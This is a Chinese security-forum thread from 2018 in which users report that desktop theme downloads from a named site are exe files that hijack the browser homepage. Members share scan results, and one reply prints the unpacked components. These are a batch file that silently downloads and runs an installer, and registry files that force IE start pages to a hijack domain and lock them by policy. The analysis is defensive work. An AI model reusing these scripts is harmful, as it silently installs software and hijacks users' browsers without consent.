查看: 2480|回复: 14
收起左侧

[可疑文件] 这个网站下载的主题好恶心 篡改主页

[复制链接]
Ytqing
发表于 2018-1-3 21:28:44 | 显示全部楼层 |阅读模式
本帖最后由 Ytqing 于 2018-1-4 10:41 编辑

www.dnzhuti.com
随便下载一个主题包
exe文件
电脑分分钟中招
浏览器主页被XX
腾讯哈勃https://habo.qq.com/file/showdet ... =ADMGYl1sB2QIP1s%2B

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
llcy
发表于 2018-1-3 21:51:41 | 显示全部楼层
不清楚 是否篡改主页

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Jerry.Lin
发表于 2018-1-3 22:37:38 | 显示全部楼层


有趣

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fireherman
发表于 2018-1-3 23:37:01 | 显示全部楼层
本帖最后由 fireherman 于 2018-1-3 23:41 编辑


ESET scan miss

VT: https://www.virustotal.com/#/fil ... 175e46204/detection

Live Grid [未收录/已上报],顺便把网址拉黑,顺便把网址提交给FireFox



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Dolby123
发表于 2018-1-4 01:05:13 | 显示全部楼层
curl.bat (偷偷下载+后台安装)
  1. [url=home.php?mod=space&uid=331734]@echo[/url] off
  2. curl.exe -o kuwo_jm694.exe http://down.kuwo.cn/mbox/kuwo_jm694.exe
  3. kuwo_jm694
复制代码

IE.reg
  1. Windows Registry Editor Version 5.00

  2. [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000000-0000-0000-0000-000000000001}]

  3. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}]
  4. @="Internet Explorer"
  5. "InfoTip"="@C:\\Windows\\system32\\zh-CN\\ieframe.dll.mui,-881"
  6. "LocalizedString"="@C:\\Windows\\system32\\zh-CN\\ieframe.dll.mui,-880"

  7. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\DefaultIcon]
  8. @="C:\\Windows\\system32\\ieframe.dll,-190"

  9. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell]

  10. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\NoAddOns]
  11. @="在没有加载项的情况下启动"

  12. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\NoAddOns\Command]
  13. @="C:\\Program Files\\Internet Explorer\\iexplore.exe http://ie.hao3535.com/?zhuti/"

  14. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Open]
  15. @="打开主页(H)"

  16. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Open\Command]
  17. @="C:\\Program Files\\Internet Explorer\\iexplore.exe http://ie.hao3535.com/?zhuti/"

  18. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Properties]
  19. @="属性(R)"

  20. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\Shell\Properties\Command]
  21. @="Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"

  22. [HKEY_CLASSES_ROOT\CLSID\{B416D23B-3B22-B6D4-BBD4-BBD452DB3D58}\ShellFolder]
  23. "Attributes"=dword:00000000
复制代码


zhuti.reg (篡改浏览器设置)
  1. Windows Registry Editor Version 5.00
  2. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MAIN]
  3. "Start Page"="ie.hao3535.com/?zhuti/"
  4. "First Home Page"="ie.hao3535.com/?zhuti/"
  5. "Default_Page_URL"="ie.hao3535.com/?zhuti/"
  6. "Search Page"="ie.hao3535.com/?zhuti/"
  7. [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main]
  8. "Start Page"="ie.hao3535.com/?zhuti/"
  9. [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
  10. "HomePage"="1"

复制代码


ziyerain2015
发表于 2018-1-4 09:40:48 | 显示全部楼层
360 MISS
HMP miss
蓝泽祈
头像被屏蔽
发表于 2018-1-4 09:44:59 | 显示全部楼层
主题是exe的你也敢用
Ytqing
 楼主| 发表于 2018-1-4 10:50:33 | 显示全部楼层
蓝泽祈 发表于 2018-1-4 09:44
主题是exe的你也敢用

看着很好看  在虚拟机一玩   中招了
Ytqing
 楼主| 发表于 2018-1-4 10:52:49 | 显示全部楼层

这东西的确设置了密码  是一个rar自解压文件(带密码 )  自解压后才是真正程序
Ytqing
 楼主| 发表于 2018-1-4 10:53:09 | 显示全部楼层
Dolby123 发表于 2018-1-4 01:05
curl.bat (偷偷下载+后台安装)

IE.reg

大佬厉害!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-23 18:59 , Processed in 0.141906 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表